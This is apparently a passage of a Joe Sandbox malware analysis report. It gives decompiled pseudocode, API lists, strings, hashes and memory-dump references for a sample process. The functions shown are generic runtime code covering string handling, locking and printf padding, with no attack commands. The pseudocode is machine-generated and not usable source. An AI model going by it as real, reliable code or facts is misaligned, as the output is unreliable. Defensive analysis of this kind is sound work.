                        • Instruction Fuzzy Hash: 95711463A09BA6B5EA30DF55C0020BDA298EB4CB94F854172DE1EB77D0EE7CE441C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: basic_string::_M_replace
                        • API String ID: 3510742995-2323331477
                        • Opcode ID: 703bcf74803a35d7be1c8add41b38c1281bf63d06090e26a57235d4faad9da79
                        • Instruction ID: d2260fad01da1cdd4a588989715db954b3591fa6242f554d1ccb6f474fda99ba
                        • Opcode Fuzzy Hash: 703bcf74803a35d7be1c8add41b38c1281bf63d06090e26a57235d4faad9da79
                        • Instruction Fuzzy Hash: 9E613622E0D7D661E931AA7590022BC6A5CEF0EB80F4981B2CE5EB77C2ED2DD441C312
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E00007FF67FF6935D4EA0(void* __ecx, void* __edi, void* __rax, void* __rcx) {
                        				char _v1272;
                        				signed int _t18;
                        				void* _t39;
                        				void* _t40;
                        				void* _t42;
                        				intOrPtr _t50;
                        				void* _t51;
                        				intOrPtr* _t52;
                        
                        				_t39 = __rax; // 0x7ff6935d4ea0
                        				_t51 = __rcx; // 0x7ff6935d4ead
                        				E00007FF67FF6935D2550(__edi, __rcx); // 0x7ff6935d4eb0
                        				_t42 = _t39; // 0x7ff6935d4eb5
                        				if (_t39 == 0) goto 0x935d4f8e; // 0x7ff6935d4ebb
                        				_t40 =  *((intOrPtr*)(_t39 + 0x28)) - 1; // 0x7ff6935d4ec5
                        				if (_t40 - 0xfffffffd > 0) goto 0x935d4f8e; // 0x7ff6935d4ecd
                        				if (GetHandleInformation(??, ??) == 0) goto 0x935d4f8e; // 0x7ff6935d4ee3
                        				_t4 = _t42 + 0x38; // 0x38 // 0x7ff6935d4ee9
                        				E00007FF67FF6935CF8A0(_t4); // 0x7ff6935d4ef0
                        				E00007FF67FF6935D2100(__ecx,  &_v1272); // 0x7ff6935d4ef5
                        				if (_t40 == 0) goto 0x935d50e0; // 0x7ff6935d4efd
                        				_t18 =  *(_t42 + 0x40) & 0x000000ff; // 0x7ff6935d4f0a
                        				if (_t51 ==  *((intOrPtr*)(_t40 + 0x1d8))) goto 0x935d5060; // 0x7ff6935d4f11
                        				if (( *(_t42 + 0x44) & 0x00000003) == 3) goto 0x935d4fa8; // 0x7ff6935d4f20
                        				if ((_t18 & 0x00000003) != 0) goto 0x935d4f80; // 0x7ff6935d4f28
                        				_t52 =  *0x935f8900; // 0x7ff6936023e0 // 0x7ff6935d4f2a
                        				_t50 =  *_t52; // 0x7ff6935d4f37
                        				 *(_t42 + 0x40) = _t18 & 0xfffffffc | 0x00000001; // 0x7ff6935d4f3a
                        				if (_t50 == 0) goto 0x935d5110; // 0x7ff6935d4f40
                        				if ( *((long long*)(_t50 + 0x18)) == 0) goto 0x935d50f0; // 0x7ff6935d4f4b
                        				asm("lock add dword [eax], 0x1"); // 0x7ff6935d4f55
                        				if ( *((intOrPtr*)(_t42 + 0x30)) == 0) goto 0x935d4f68; // 0x7ff6935d4f60
                        				SetEvent(??); // 0x7ff6935d4f62
                        				E00007FF67FF6935CFBC0(_t4); // 0x7ff6935d4f6b
                        				return 0; // 0x7ff6935d4f7f
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Thread$Event$Context$HandleInformationObjectResumeSingleSuspendValueWait
                        • String ID:
                        • API String ID: 2335333592-0
                        • Opcode ID: 20659410290ff6e9b51c0a146a8f52cba0532b1fe1e4e8c13e0672c912a54f43
                        • Instruction ID: d0aa13c01b4ec6857d7a549cde9795805cbd9cfd2b54ebcf5b1fdbccf6703a5c
                        • Opcode Fuzzy Hash: 20659410290ff6e9b51c0a146a8f52cba0532b1fe1e4e8c13e0672c912a54f43
                        • Instruction Fuzzy Hash: 918193B290964281FB799B25D44337927A8FF48B98F5445B6DA7CAB3D5DF2CE880C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E00007FF67FF6935E6CB0(intOrPtr* __rcx, void* __rdx) {
                        				void* _t13;
                        
                        				_t13 = __rdx; // 0x7ff6935e6cc5
                        				if (__rdx - 0xfffffff9 > 0) goto 0x935e6d1f; // 0x7ff6935e6cd5
                        				E00007FF67FF6935E78B0(__rcx, __rdx,  *((intOrPtr*)( *__rcx - 0x18)), __rdx); // 0x7ff6935e6cdc
                        				if (_t13 == 0) goto 0x935e6cfc; // 0x7ff6935e6ce4
                        				if (_t13 == 1) goto 0x935e6d10; // 0x7ff6935e6cee
                        				return memset(??, ??, ??); // 0x7ff6935e6d07
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$memset
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
                        • API String ID: 438689982-1339558951
                        • Opcode ID: fb0e05b5eb08b727b81707ba047db16b2e10515fa45a4eea2f2462b34b55589b
                        • Instruction ID: fb8959845b86b066b0f4c06ee06fc39c1bfd431297478ca2934e0c7a3ee67be1
                        • Opcode Fuzzy Hash: fb0e05b5eb08b727b81707ba047db16b2e10515fa45a4eea2f2462b34b55589b
                        • Instruction Fuzzy Hash: EE511652F0939661F931AA6694060FD2258DF0DBD4B4841B2EE2CF77D6DD2CE982C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpywcslen
                        • String ID: $0$@$\??\$basic_string::_M_construct null not valid
                        • API String ID: 982415701-2971582370
                        • Opcode ID: 85a96a3926fdf2f1929166f4ba83e6a6068a208a621f981d024bae726ae04d13
                        • Instruction ID: db026798ffb75b5fc3f74178bc0115e3d8db27c8dfcac7428b517fd889f2d96c
                        • Opcode Fuzzy Hash: 85a96a3926fdf2f1929166f4ba83e6a6068a208a621f981d024bae726ae04d13
                        • Instruction Fuzzy Hash: 17611632608BC595EB708F15E4523AAB7A8FBC8788F844265DA8C97B99DF7DC044CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 29%
                        			E00007FF67FF6935D8580(void* __esi, long long* __rcx, void* __rdx) {
                        				long long _v72;
                        				void* _t12;
                        				long long* _t28;
                        				intOrPtr _t47;
                        
                        				_t28 = __rcx; // 0x7ff6935d858e
                        				if (__rcx == 0) goto 0x935d8740; // 0x7ff6935d8594
                        				_t47 =  *((intOrPtr*)(__rcx)); // 0x7ff6935d859a
                        				r13d = 0x16; // 0x7ff6935d859d
                        				if (_t47 == 0) goto 0x935d8674; // 0x7ff6935d85a6
                        				if (_t47 == 0xffffffff) goto 0x935d8690; // 0x7ff6935d85b0
                        				_t1 = _t47 + 0x98; // 0x98 // 0x7ff6935d85b6
                        				_t3 = _t47 + 0x70; // 0x70 // 0x7ff6935d85c6
                        				_v72 = _t1; // 0x7ff6935d85cd
                        				r8d = 0xffffffff; // 0x7ff6935d85d5
                        				_t12 = E00007FF67FF6935D84E0(0,  *((intOrPtr*)(_t47 + 0xa8)), _t3); // 0x7ff6935d85db
                        				r13d = _t12; // 0x7ff6935d85e0
                        				if (_t12 != 0) goto 0x935d8674; // 0x7ff6935d85e5
                        				if (TryEnterCriticalSection(??) == 0) goto 0x935d8780; // 0x7ff6935d8603
                        				if ( *((intOrPtr*)(_t47 + 8)) -  *((intOrPtr*)(_t47 + 0x10)) > 0) goto 0x935d8750; // 0x7ff6935d8613
                        				 *_t28 = 0; // 0x7ff6935d8619
                        				E00007FF67FF6935D7C40(1,  *((intOrPtr*)(_t47 + 0xa8)), _t3, _t1); // 0x7ff6935d862b
                        				CloseHandle(??); // 0x7ff6935d863f
                        				CloseHandle(??); // 0x7ff6935d8649
                        				LeaveCriticalSection(??); // 0x7ff6935d864e
                        				DeleteCriticalSection(??); // 0x7ff6935d865e
                        				DeleteCriticalSection(??); // 0x7ff6935d8663
                        				DeleteCriticalSection(??); // 0x7ff6935d866a
                        				free(??); // 0x7ff6935d866f
                        				return r13d; // 0x7ff6935d8685
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$Leave$DeleteEnter$CloseHandle$ReleaseSemaphorefree
                        • String ID:
                        • API String ID: 897415695-0
                        • Opcode ID: 98e52681dfc08f8f17fc14becac0e5c9275e4dc488c58711f086fe0bacfdf0f2
                        • Instruction ID: 7d23bfdf4fce7f9974df5ad4b98fc57590d5e18910937606aea362a683ced656
                        • Opcode Fuzzy Hash: 98e52681dfc08f8f17fc14becac0e5c9275e4dc488c58711f086fe0bacfdf0f2
                        • Instruction Fuzzy Hash: 1A518621A08A4680FA709B66D8067BA2698FF58BA8F5445B6DD7DE33D1CF3CE841D341
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • calloc.MSVCRT(?,00007FF6936023E0,00000000,00007FF6935D6F57,?,?,?,00007FF6935D7085,?,?,?,?,00007FF6935D7225,?,00007FF6936023E0), ref: 00007FF6935D7F8C
                        • CreateSemaphoreA.KERNEL32 ref: 00007FF6935D7FCC
                        • CreateSemaphoreA.KERNEL32 ref: 00007FF6935D7FE3
                        • InitializeCriticalSection.KERNEL32(?,00007FF6936023E0,00000000,00007FF6935D6F57,?,?,?,00007FF6935D7085,?,?,?,?,00007FF6935D7225,?,00007FF6936023E0), ref: 00007FF6935D800B
                        • InitializeCriticalSection.KERNEL32(?,00007FF6936023E0,00000000,00007FF6935D6F57,?,?,?,00007FF6935D7085,?,?,?,?,00007FF6935D7225,?,00007FF6936023E0), ref: 00007FF6935D8012
                        • InitializeCriticalSection.KERNEL32(?,00007FF6936023E0,00000000,00007FF6935D6F57,?,?,?,00007FF6935D7085,?,?,?,?,00007FF6935D7225,?,00007FF6936023E0), ref: 00007FF6935D8019
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalInitializeSection$CreateSemaphore$calloc
                        • String ID:
                        • API String ID: 2075313795-0
                        • Opcode ID: 578a62fee32b065a37f44c76b97850696633159970b86e5555a345ebaa48b1d8
                        • Instruction ID: ca3f2f1453164c866b21e9fbd3a4b0546fb16d419511fae39a05d30bec1656a8
                        • Opcode Fuzzy Hash: 578a62fee32b065a37f44c76b97850696633159970b86e5555a345ebaa48b1d8
                        • Instruction Fuzzy Hash: BD21B632B1571286FB65DB65F81AB7A2298EF48794F4481B6CE2C973C0DE3D9885C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 47%
                        			E00007FF67FF6935CDA10(void* __ebx, long __rcx, long long __rdx, long long __r8, long long __r9, long long _a16, long long _a24, long long _a32) {
                        				void* _v32;
                        				intOrPtr _v108;
                        				void* _v144;
                        				void* _t19;
                        				void* _t20;
                        				void* _t22;
                        				void* _t26;
                        				intOrPtr _t42;
                        				long long _t44;
                        				intOrPtr _t45;
                        				intOrPtr* _t46;
                        				long long _t47;
                        				intOrPtr _t48;
                        				intOrPtr* _t49;
                        				intOrPtr _t50;
                        				void* _t51;
                        				void* _t52;
                        				signed long long _t55;
                        				long long _t59;
                        				intOrPtr _t64;
                        				struct _MEMORY_BASIC_INFORMATION* _t67;
                        				long long _t80;
                        
                        				_t26 = __ebx;
                        				_t44 =  &_a16;
                        				_a16 = __rdx;
                        				_a24 = __r8;
                        				_a32 = __r9;
                        				_v32 = _t44;
                        				_t20 = E00007FF67FF6935E10F0(_t19, 2, _t44, __rcx);
                        				r8d = 0x1b;
                        				0x935e0a68(_t51);
                        				_t52 = _v32;
                        				E00007FF67FF6935E10F0(_t20, 2, _t44, "Mingw-w64 runtime failure:\n");
                        				_t59 = _t44;
                        				0x935e09e8();
                        				0x935e0ab0();
                        				asm("o16 nop [eax+eax]");
                        				_t80 = _t59;
                        				if (_t26 <= 0) goto 0x935cdbb0;
                        				_t45 =  *0x936020e8; // 0xcbaac9f5e0
                        				_t46 = _t45 + 0x18;
                        				asm("o16 nop [eax+eax]");
                        				_t64 =  *_t46;
                        				if (_t64 - _t80 > 0) goto 0x935cdacc;
                        				_t7 = _t46 + 8; // 0x2954bdc0000
                        				_t8 =  *_t7 + 8; // 0x100f288de5e4ab2
                        				r8d =  *_t8;
                        				if (_t80 - _t64 +  *_t7 < 0) goto 0x935cdb53;
                        				_t47 = _t46 + 0x28;
                        				if (1 != _t26) goto 0x935cdab0;
                        				_t22 = E00007FF67FF6935CE780();
                        				if (_t47 == 0) goto 0x935cdbd2;
                        				_t48 =  *0x936020e8; // 0xcbaac9f5e0
                        				_t55 =  *0x936020e4 +  *0x936020e4 * 4 << 3;
                        				_t49 = _t48 + _t55;
                        				 *((long long*)(_t49 + 0x20)) = _t47;
                        				 *_t49 = 0;
                        				E00007FF67FF6935CE8B0(_t22,  *_t7);
                        				r8d = 0x30;
                        				_t50 =  *0x936020e8; // 0xcbaac9f5e0
                        				 *((long long*)(_t50 + _t55 + 0x18)) = _t80 + _t49;
                        				VirtualQuery(_t52, _t67, __rcx);
                        				_t42 = _t50;
                        				if (_t42 == 0) goto 0x935cdbb7;
                        				if (_t42 == 0) goto 0x935cdb4c;
                        				if (_t42 != 0) goto 0x935cdb60;
                        				 *0x936020e4 =  *0x936020e4 + 1;
                        				return _v108;
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: QueryVirtual
                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                        • API String ID: 1804819252-1534286854
                        • Opcode ID: 5cda007aa49554ac35d177fdf0245f417c8f8c2cec54b3ae395e2d1ba7d2158f
                        • Instruction ID: 76f17b593330f8c685599f63fb565e4c90fa9a26dd1ca1ac824521b417e208cd
                        • Opcode Fuzzy Hash: 5cda007aa49554ac35d177fdf0245f417c8f8c2cec54b3ae395e2d1ba7d2158f
                        • Instruction Fuzzy Hash: 4451F832A0874692EF309B12E8436B977A8FF49B98F448175DE0EA7354EE3CE545C740
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %*.*s$%-*.*s$%.*s
                        • API String ID: 0-4054516066
                        • Opcode ID: 9c7f394b717ff8d1f3f37ca319c6d46d386816c32e0a13c87973d63059d2cdb8
                        • Instruction ID: f31fab358ccd3ff95d2f9e6bbe793096e6fb61701360d6ad7e19ad1f5daea5c3
                        • Opcode Fuzzy Hash: 9c7f394b717ff8d1f3f37ca319c6d46d386816c32e0a13c87973d63059d2cdb8
                        • Instruction Fuzzy Hash: 335197B7A1825286E7708F65D54277877A9EB0CB94F14C276DA5DEB698CE2CE8008B40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E00007FF67FF6935DBCA0(void* __edx, void* __rax, void* __rcx, void* __r8) {
                        				signed int _v72;
                        				char _v80;
                        				intOrPtr _t19;
                        				intOrPtr _t28;
                        				void* _t40;
                        				void* _t48;
                        				void* _t52;
                        				void* _t53;
                        				char* _t62;
                        
                        				_t52 = __rax;
                        				_t19 =  *((intOrPtr*)(__r8 + 0x10));
                        				_t53 = __r8;
                        				if (_t19 < 0) goto 0x935dbcbf;
                        				_t40 =  >  ? _t19 : __edx;
                        				r8d =  *((intOrPtr*)(__r8 + 0xc));
                        				if (( *(__r8 + 8) & 0x00006000) == 0x6000) goto 0x935dbdc8;
                        				if (_t40 - r8d < 0) goto 0x935dbd60;
                        				 *((intOrPtr*)(__r8 + 0xc)) = 0xffffffff;
                        				if (_t40 > 0) goto 0x935dbd1b;
                        				goto 0x935dbdad;
                        				_t62 = __rcx + __rax;
                        				E00007FF67FF6935DBC40(_v72 & 0xffff, __r8);
                        				if (_t40 == 0) goto 0x935dbdad;
                        				_v80 = 0;
                        				strlen(??);
                        				E00007FF67FF6935E0CE0( &_v72, _t62, _t52,  &_v80);
                        				_t48 = _t52;
                        				if (_t48 == 0) goto 0x935dbdad;
                        				if (_t48 >= 0) goto 0x935dbd00;
                        				_v72 =  *_t62;
                        				goto 0x935dbd05;
                        				asm("o16 nop [cs:eax+eax]");
                        				r8d = r8d - _t40 - 1;
                        				 *((intOrPtr*)(_t53 + 0xc)) = r8d;
                        				if (0 != 0) goto 0x935dbcea;
                        				r8d = r8d - 1;
                        				 *((intOrPtr*)(_t53 + 0xc)) = r8d;
                        				E00007FF67FF6935DBC40(0x20, _t53);
                        				 *((intOrPtr*)(_t53 + 0xc)) = _t52 - 1;
                        				if ( *((intOrPtr*)(_t53 + 0xc)) != 0) goto 0x935dbd80;
                        				goto 0x935dbcea;
                        				E00007FF67FF6935DBC40(0x20, _t53);
                        				_t28 =  *((intOrPtr*)(_t53 + 0xc));
                        				 *((intOrPtr*)(_t53 + 0xc)) = _t52 - 1;
                        				if (_t28 > 0) goto 0x935dbda0;
                        				return _t28;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %*.*S$%-*.*S$%.*S
                        • API String ID: 0-2115465065
                        • Opcode ID: 7e271c27211a09b8ae5f979a1daaaa6e2f32cd394a5110707addeabbafaf46e7
                        • Instruction ID: 73ae0045d7b6227d33540b4dff402a9f0d4298881bec86589311e25d4c83cdad
                        • Opcode Fuzzy Hash: 7e271c27211a09b8ae5f979a1daaaa6e2f32cd394a5110707addeabbafaf46e7
                        • Instruction Fuzzy Hash: C341D373B1824786E7709A26D40277962DAEF88B94F58C1B6DE2CDB7C9DE3DE4408700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpywcslen
                        • String ID: 0$@$\??\$basic_string::_M_construct null not valid
                        • API String ID: 982415701-2209788446
                        • Opcode ID: 12c5a9589c110c7d1280ab66f4bda8f8eb496f91c2c944bc910a01eaae476777
                        • Instruction ID: 7a465bf72ae1029f67656287f322863102a8143f4ab3c1abdf9f14a4e4b1a414
                        • Opcode Fuzzy Hash: 12c5a9589c110c7d1280ab66f4bda8f8eb496f91c2c944bc910a01eaae476777
                        • Instruction Fuzzy Hash: F5613672608BC585EB708F15F4523AAB7A4FBC8788F844225DA8C97B99DF7CD144CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcmp$strlen
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                        • API String ID: 3738950036-1697194757
                        • Opcode ID: c26d36d5394dd7cadfb9f516a75abf6982fffafdfa7c60d4e41d8d19651cde4a
                        • Instruction ID: 36ebc984ac2804d824bb874ca9ab5740b4a0ca03749b3517adb77dfa04fc2a7f
                        • Opcode Fuzzy Hash: c26d36d5394dd7cadfb9f516a75abf6982fffafdfa7c60d4e41d8d19651cde4a
                        • Instruction Fuzzy Hash: 9251EA92B04A8692FE309A26DD422F45298DF1CBE4F5C4671DE2CE77D5ED1CD9869300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
